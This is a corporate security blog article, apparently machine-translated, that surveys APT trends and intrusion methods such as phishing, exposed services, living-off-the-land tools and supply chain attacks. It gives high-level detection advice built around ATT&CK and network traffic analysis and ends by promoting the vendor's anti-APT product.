Get best of the week

A wolf in sheep's clothing: how to catch a hacker who carefully disguises himself as an ordinary user



Image: Unsplash

With the growth of hacker activity, products and methods are appearing that allow you to identify the actual methods of hacking, fixing, spreading. Therefore, hackers try to be one step ahead and remain as inconspicuous as possible.

Today we will talk about tactics for hiding the traces of our actions that cybercriminals use, and talk about how to figure them out.


Investigating the activities of APT groups , this year we revealed an increase in the number of APT attacks in various industries. If last year 12 APT groups came into our view, then this year 27 groups became the subject of research. This trend also correlates with the constant increase in the number of unique cyber incidents from quarter to quarter (according to our data, in the third quarter of 2019, 6% more unique incidents were recorded than in the second). These conclusions are confirmed by the data of the General Prosecutor's Office: last year the number of IT crimes almost doubled compared to 2018 and by the end of the year reached 270,000 registered cases only, i.e. 14% of the total number of all registered crimes in Russia. As expected, targeted attacks prevailed significantlyover massive. During 2019, we observed an increase in targeted attacks: in the third quarter, their share was 65% (against 59% in the second quarter and 47% in the first).

Behind a hacker attack is almost always financial motivation. Most often, attackers steal money directly from company accounts. In other cases, they steal confidential data and documents for extortion or break into the infrastructure of companies and sell access to them on the black market. Also, you cannot write off ordinary espionage, in which attackers are not interested in money, but in information. Most often, the motivation for this type of attack is competition: hackers can steal trade secrets by order, disrupt the work of another company, and involve it in a scandal. As part of our studyWe identified 10 APT groups that attacked state-owned companies in Russia over the past two years and noted that their main motive was espionage. In addition, we conducted a survey of IT and information security experts on the readiness of their companies to resist APT attacks. Every second respondent from the public sector (45%) replied that his company is not ready for APT, and 68% noted that their information security specialists are not qualified enough to counter such complex threats.

Our projects for retrospective analysis and investigation of incidents indicate that many companies that have switched to the practice of detecting cyber incidents find traces of hacks that occurred several months or even several years ago ( TaskMasters was identified last year, which was in the infrastructure of one of the victims for at least eight years). This means that criminals have long controlled many organizations, but the organizations themselves do not notice their presence, thinking that they are actually protected. Moreover, it often turns out that not only one, but several groups “live” in the infrastructure of such companies.

According to our estimates , a set of tools for conducting an attack aimed at stealing money from a bank can cost from 55 thousand US dollars. A cyber spy campaign is much more expensive, its minimum budget is 500 thousand US dollars.

It would seem that the market offers many anti-hacking products. But how do intruders penetrate a network of organizations? We will consider this issue in today's article.

Social engineering


Social engineering is one of the most common ways to penetrate infrastructure. Large companies employ a lot of people, their awareness of information security rules can be different - because of this, some employees are more likely to be attacked using social engineering methods and phishing. And to compile a list for phishing mailing, it is enough to conduct a search on open sources (OSINT).

Many of us have accounts in social networks, some of them post information about our place of work. Most often, an employee’s email is a combination of “the first letter of the first name + last name in English” with slight variations. Therefore, it is enough for the hacker to know the format of the company’s electronic address and the full name of the employee in order to get his email address with 90% probability. You can also buy data on shadow forums or in the corresponding channels of popular instant messengers, as well as find in the next "drain" of databases.

Vulnerabilities in Internet Access Infrastructure


Bloody Enterprise is not only a large number of people, but also a large number of services: remote access services, databases, administration panels, websites. And the more of them, the more difficult it is to control them. Therefore, there are situations when, due to configuration errors, the service becomes accessible from the outside. If a hacker constantly monitors the organization’s perimeter, then he will immediately notice such a “hole” in the infrastructure, the timing depends only on how often he scans the perimeter, from a couple of minutes to a day.

In the worst-case scenario, a “bare” service will have a known vulnerability, which will allow an attacker to immediately use the exploit and get into the network. And if the standard password has not been changed when configuring the service, the hacker will find access to the data several times faster by selecting the standard connection of login and password.

Why attacks are getting harder to spot




A turning point in the process of complicating hacker attacks was the appearance of the Stuxnet worm in 2010, which many call the first cyber weapon. For a long time he was unnoticed in the network of the Iranian nuclear program, controlled the speed of the centrifuges for uranium enrichment and disabled equipment. Over the years, he was already found in other computer networks. Using zero-day vulnerabilities, digital signatures, distribution via USB devices and shared printers allowed the worm to go undetected for a long time.

Hackers began to unite in groups. If in the zero we observed more single hackers, then in the 2010s began an active growth in organized cybercrime. However, the number of crimes began to increase rapidly. At the same time, at the beginning of the decade, business owners did not think much about the information security of their organization, which allowed hackers to steal millions of dollars almost unhindered. In the first half of the decade, financial institutions were not ready for the emergence of complex malware, such as Carberp and Carbanak . As a result of attacks using them, approximately $ 1 billion of damage was caused.

Today there are solutions for detecting hacks and for detecting the activity of attackers in the infrastructure. In response, hackers develop workarounds to go undetected for as long as possible. For example, they use techniques such as living-off-the-land . In such attacks, for the remote execution of commands on nodes, mechanisms built into the OS and trusted programs are used. In the Windows infrastructure, these can be PowerShell, WMI, utilities from the Sysinternals suite. For example, the PsExec utility has proven itself both among IT administrators and among cybercriminals.

Attackers also use the watering hole technique - they hack into an industry site or application that employees of the company often visit and use and place malicious code in them. After the user launches the application or logs into the site, malware is downloaded to his device through which the attacker enters the infrastructure. This method has been adopted by such APT groups as Turla , Winnti .

Some hacker groups, for example Cobalt, Silence, TaskMasters, use the supply chain attack method. Attackers hack in advance the servers of the partner of the target organization and already carry out phishing mailings from his mailboxes. Hackers are not limited to sending letters, but attacking software developers used by organizations of interest and embed malicious code, for example, in the next update. All users who install this update infect their computers. So, the malicious code of the NotPetya ransomware virus was built into just one of the updates of the accounting program.

However, with all the advantages of an attacker malware, an antivirus or sandbox can detectif it was sent via mail. In this regard, attackers invent increasingly sophisticated code obfuscation techniques - for example, virtualizing it - carry out file-free attacks and insert anti-VM and antisandbox methods into the code.

It cannot be ruled out that an attacker could manage to do without malware at all within the network, limiting himself to the tools allowed by security policies.

How to catch a hacker in infrastructure: best practices and major mistakes




The easiest way to prevent an uninvited guest from appearing in your infrastructure is to build the right line of defense. Three main components can be distinguished here:

  • reliable perimeter;
  • knowledgeable users;
  • role and password policies.

There is an excellent statement from Sun Tzu’s book “The Art of War”: “Go forward, where you are not waiting, attack where you are not prepared.” Ensuring cybersecurity should not be limited to the perimeter and traditional means of protection. As the results of our study showed , 92% of threats are identified when the enemy is already inside.

Cybergroups have successfully learned to overcome defense on the perimeter of organizations of interest to them, and this is evidenced by the trend towards an increase in the share of successful targeted attacks . This is an occasion to shift the focus of attention from preventing attacks on the perimeter to the timely detection of compromise and response within the network.

If the incident still happened, you need to build the whole chain of events that the hacker made on the way to his goal - timeline. When an incident is detected, many do not know how to react correctly, panic and make mistakes already in the early stages. The hectic elimination of the consequences of the incident begins, which leads to the erasure of its artifacts. However, few people immediately think about the reasons for its appearance, and by the time the need to find the cause becomes apparent, most of the traces have already been destroyed - you have to restore the picture from what remains.

It happens that in the course of an incident the hacker still remains online and the victim tries to “knock him out” with all available means, without understanding what part of the infrastructure and services the attacker controls. In this case, the hacker can leave, loudly slamming the door: for example, by encrypting the nodes under control.

Finding a hacker in a hacker’s infrastructure is not always a trivial task. With a competent approach, he can remain in the infrastructure for a long time. For example, the TaskMasters group that was discoveredexperts of PT Expert Security Center in 2018, in some organizations for years hid their presence. At the same time, hackers returned several times to the hacked infrastructure in order to unload another piece of data, after which they filled up a dug hole, leaving several access points to the internal network. And every time they went unnoticed. In such cases, hackers could be calculated by abnormal network activity (which mainly occurred at night) by a large amount of traffic to external nodes or non-standard horizontal movements inside.

But what if we do not know if there is a hacker inside the network and want to protect ourselves by checking the absence of hacking? To do this, you need to have a large knowledge base on how a hacker can act: how to penetrate, how to gain a foothold, how to move. Fortunately, such a knowledge base exists and is called ATT & CK , developed and supported by MITER Corporation based on analysis of real APT attacks. The base is a visual table of tactics that a hacker can resort to in order to successfully achieve his goal. It structured knowledge about targeted attacks and categorized the actions of attackers. The database is constantly updated by researchers from all over the world, which allows information security experts from all countries to speak the same language. In addition, knowledge of tactics allows you to successfully identify traces of hacking and prepare in advance - to strengthen weaknesses, establish increased control over them and quickly respond to the appearance of an attacker.

In addition, crackers leave traces in network traffic, which means that the task of a cybersecurity specialist is to detect these traces. results Our pilot projects have shown that NTA class solutions can effectively identify threats of varying degrees of risk - from violations of IS regulations to complex targeted attacks.

Technical details on how to catch a hacker in network traffic (a detailed manual with screenshots) can be found in our Anti-Malware article .

What to expect in the future: cybersecurity trends


News about data leaks in recent years has become especially loud, including because attackers manage to use leaks of past years. This gives them more complete digital files of a huge number of users. Expected to continue this trend.

In 2019, we recorded more than one and a half thousand hacker attacks; This is 19% more than in 2018. In 81% of cyber attacks, the victims were legal entities. At the end of the year, the five most frequently attacked sectors included state institutions, industry, medicine, the field of science and education, and the financial sector. The industry focus will continue in the future.

The proportion of targeted attacks is growing: in each quarter we observed more targeted attacks than in the previous one. In the first quarter of 2019, less than half of the attacks (47%) were targeted, and at the end of the year their share was already 67%. Expect further growth of APT attacks .

In order to manage to respond to new threats, protection technologies must also be actively developed. However, it will not be possible to achieve a high level of protection with the help of only countermeasures and attack detection tools. We recommend that companies regularly conduct penetration testing and training of IS employees as part of red teaming - this will detect and timely eliminate potential attack vectors for critical resources and debug IS and IT service interactions in the event of a cyber attack.

Our company has developed an anti-APT network protection system for the organization , designed to detect and prevent targeted attacks. It allows you to quickly detect the presence of an attacker on the network and recreate the full picture of the attack for a detailed investigation. Detection of abnormal activity on the network, retrospective analysis of files and an advanced sandbox can reduce the response time to an incident or prevent it altogether.

Posted by Denis Kuvshinov, Leading Specialist, Positive Technologies Cyber ​​Threat Research Team

More articles:


All Articles